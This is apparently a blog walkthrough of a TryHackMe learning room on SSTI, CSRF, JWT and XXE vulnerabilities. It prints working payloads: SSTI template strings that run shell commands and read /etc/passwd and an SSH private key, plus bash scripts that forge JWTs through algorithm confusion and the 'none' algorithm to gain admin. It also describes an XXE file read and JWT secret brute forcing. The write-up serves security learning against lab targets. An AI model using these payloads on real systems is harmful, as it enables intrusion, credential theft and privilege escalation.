TryHackMe | ZTH: Obscure Web Vulns

8 min readSep 8, 2021


ZTH: Obscure Web vuls is a learning room on TryHackMe created by Paradox. This room allows you to learn and practice exploiting a range of unique web vulnerabilities such as SSTI, CSRF, JWT and XXE.

Task 1 : Covers the intro and tells us that we will be learning SSTI, CSRF, JWT and XXE.

Click “Question Done” to proceed

Task 2: Provides an overview on how the room is divided up and the format on how questions and challenges will be presented.

Click “Question Done” to proceed

Task 3: Discusses Server Side Templates and what Server Side Template Injection SSTI is.

Click “Question Done” to proceed

Task 4: Provides explores template injection a little further with some detailed examples.

Q1: How would a hacker(you :) ) cat out /etc/passwd on the server(using cat with the rce payload)

The answer below is provided as a guided example on the page.

{{config.__class__.__init__.__globals__[‘os’].popen(‘cat /etc/passwd’).read()}}

Q2: What about reading in the contents of the user test's private ssh key.(use the read file one not the rce one)

The answer below is provided as a guided example on the page.

{{ ''.__class__.__mro__[2].__subclasses__()[40]('/home/test/.ssh/id_rsa').read() }}

Task 5: Automatic Exploitation of SSTI

Q:1 How would I cat out /etc/passwd using tplmap on the ip:port combo, with the vulnerable param “noot”.

tplmap -u -d 'noot' --os-cmd "cat /etc/passwd"

Task 6: SSTI Challenge

For this challenge you will need to start the Vulnerable Machine and using SSTI obtain the /flag file on the machine.

We can use a modified version of Task 4 to obtain the flag.

{{config.__class__.__init__.__globals__['os'].popen('cat /flag').read()}}
Flag via Firefox

Additionally this same command can be run from curl via the command line.

curl -X POST -F “name={{config.__class__.__init__.__globals__[‘os’].popen(‘cat /flag’).read()}}” = Request
-F = Form reques
Flag via curl

Go ahead and terminate your machine and startup the machine in Task 14 so it is ready for you to go when we get there.

Task 7: What is CSRF

This section will walk us through a quick understanding or Cross Site Request Forgery.

Click “Question Done” to proceed

Task 8: Manual exploitation of CSRF

Very good explanation of CSRF and how it looks through a proxy like Burp.

Click “Question Done” to proceed

Task 9: Automatic Explotation

Discusses automatic tools like XSSRFProbe and how to install and use it.

Q: What parameter allows us to generate a POC(actual exploit)?


Task 10: CSRF Challenge

Due to the nature of CSRF, I can’t really give you a challenge to complete with a flag. So I’ll give you one without a flag! Your challenge is to make a website vulnerable to CSRF, and exploit it

Click “Question Done” to proceed

Task 11: Java Web Token JWT introduction

This section covers what Java Web Tokens are and how they are constructed.

Click “Question Done” to proceed

Task 12: Manual JWT Exploitation

This section covers the basics of exploiting Java Web Tokens. Pay attention here, we may need to refer back to this section in a bit.

Click “Question Done” to proceed

Task 13: Automatic JWT exploitation

There really isn’t a one stop shop for automatic JWTs and need to be looked at on a case by case basis.

Click “Question Done” to proceed

Task 14: JWT Challenge

For this challenge you will need to start the vulerable machine and interact with a webpage to obtain a JWT token and exploit the token using the steps provided in the previous section.

This question was really fun, however because the tokens expired in a few minutes I decided to just write up a dirty bash script to make the submission.

After updating the IP to the IP of the JWT webserver you can save and perform a chmod +x then you should just be able to run ./ and it will execute.

#!/bin/bash# Update the IP to the IP of the vulnerable machineip=
echo ""
echo "TryHackMe ZTH: Obscure Web Vulns JWT Challenge"
echo ""
echo "[+] downloading public key "
if [ -f public.pem ] ;then
echo "[i] Removing old Public Key"
rm public.pem
wget --quiet http://$ip/public.pem &1>/dev/null
echo "[+] Obtaining JWT file from http://$ip"
curl -s http://$ip | grep -o ey.* >jwt
part1=$(cat jwt | cut -f1 -d".")
part2=$(cat jwt | cut -f2 -d".")
part3=$(cat jwt | cut -f3 -d".")
echo "[+] Changing Header from RS256 to HS256"newpart1=$(echo $part1 | base64 -d | sed 's/RS256/HS256/g' | base64)echo "[+] Converting public key to hex"cat public.pem | xxd -p | tr -d "\\n" >public.xxd
publicxxd=$(cat public.xxd)
echo "[+] Signing the JWT with the valid HS256 key"key=$(echo -n $newpart1.$part2 | openssl dgst -sha256 -mac HMAC -macopt hexkey:`cat public.xxd`| tr -d " " | cut -f2 -d "=")echo "[+] Decode the hex to binary and reencoded the data" secret=$(python2 -c "exec(\"import base64, binascii\nprint base64.urlsafe_b64encode(binascii.a2b_hex('"$key"')).replace('=','')\")")echo ""
echo "---Manual Submission--"
echo $newpart1.$part2.$secret
echo "----------------------"
echo ""
echo "[+] Attempting submission via curl"curl -s -X POST -F "jwt=$final" http://$ip/rs256.php | sed 's/<.*>//g'# The sed 's/<.*>//g' at the last part of the curl command is to pull out all the HTML tags and display text.

Task 15: JWT Intro

Discusses other vulnerabilities with JWT libraries and how important it is for developers to read the RFC or RTFM.

Click “Question Done” to proceed

Task 16: Manual JWT exploitation

Shows a manual walkthrough of exploiting JWT by setting the algorithm to NONE…

Click “Question Done” to proceed

Task 17: Automatic JWT exploitation

There really isn’t any tool that can perform automatic exploitation of JWT tokens. This is a manual and inspect as you go type situation.

Click “Question Done” to proceed

Task 18: JWT Challenge

Startup the machine and find the flag

The first attempt with asdf:asdf didn’t do anything… but after that we were provided with the credentials of a normal user.

Opening up the developer tools either by pressing SHIFT-F9 to open the storage inspector or by clicking on the “hamburger menu” in the upper right of firefox and selecting “webdeveloper-> storage Inspector” you will be able to inspect the JWT cookie.

Double clicking in the cookie value area you can copy the actual cookie which is listed below.


The previous couple of tasks identified how to manipulate this cookie and modify it to become an admin on the site.

A little bash script below will take the above JWT cookie and remove the HS256 requirement and set it to non and then make the user an admin.

#!/bin/bashif [ $# -eq 0 ] ; then
echo "USAGE: $0 JavaWebToken"
part1=$(echo -n $jwt | cut -f1 -d'.' | base64 -di | sed 's/HS256/none/g'| base64)
part2=$(echo -n $jwt | cut -f2 -d'.' | base64 -di | sed 's/user/admin/g' | base64)
echo ""
echo $part1.$part2. | tr -d ' ='

By selecting the new modified cookie and pasting it into the firefox cookie jar where we originally obtained it and refresh the website…

Task 19: XXE Intro

Click “Question Done” to proceed

Task 20: Manual exploitation of XXE

Click “Question Done” to proceed

Task 21: Automatic exploitation of XXE

This is very difficult to have a one size fits all auto XXE solution.

Click “Question Done” to proceed

Task 22: XXE Challenge

Q: How many users are on the system?

Lets give it a go! …and refer to Task 20 if you have any questions.

Regardless of what I put in the form it gives the same error…

Lets fire up burp and intercept the traffic being submitted.

Some XML, this is consistent with challenge. Lets try and manipulate it.

By placing the XXE file:///etc/passwd we can now see the passwd file in the right hand pane of burp.

By counting the number or users listed in /etc/passwd we can answer how many users are on the system.

Q: How many users are on the system?

A: 31

Q: What is the name of the user with a UID of 1000?

A: para

Task 23: JWT once again

Click “Question Done” to proceed

Task 24: Bruteforcing JWT tokens

Click “Question Done” to proceed

Task 25: Challenge Bruteforcing JWT tokens

Q: Given the following token

What is the secret?

For this challenge I had to run my own Kali instance, as the TryHackMe attack box would not install npm or jwt-cracker.

Regardless …once jwt-cracker was installed it cracked the token in a few seconds.

Thank you Paradox for such a informative and fun room to learn web exploits!




…I have no idea what I’m doing.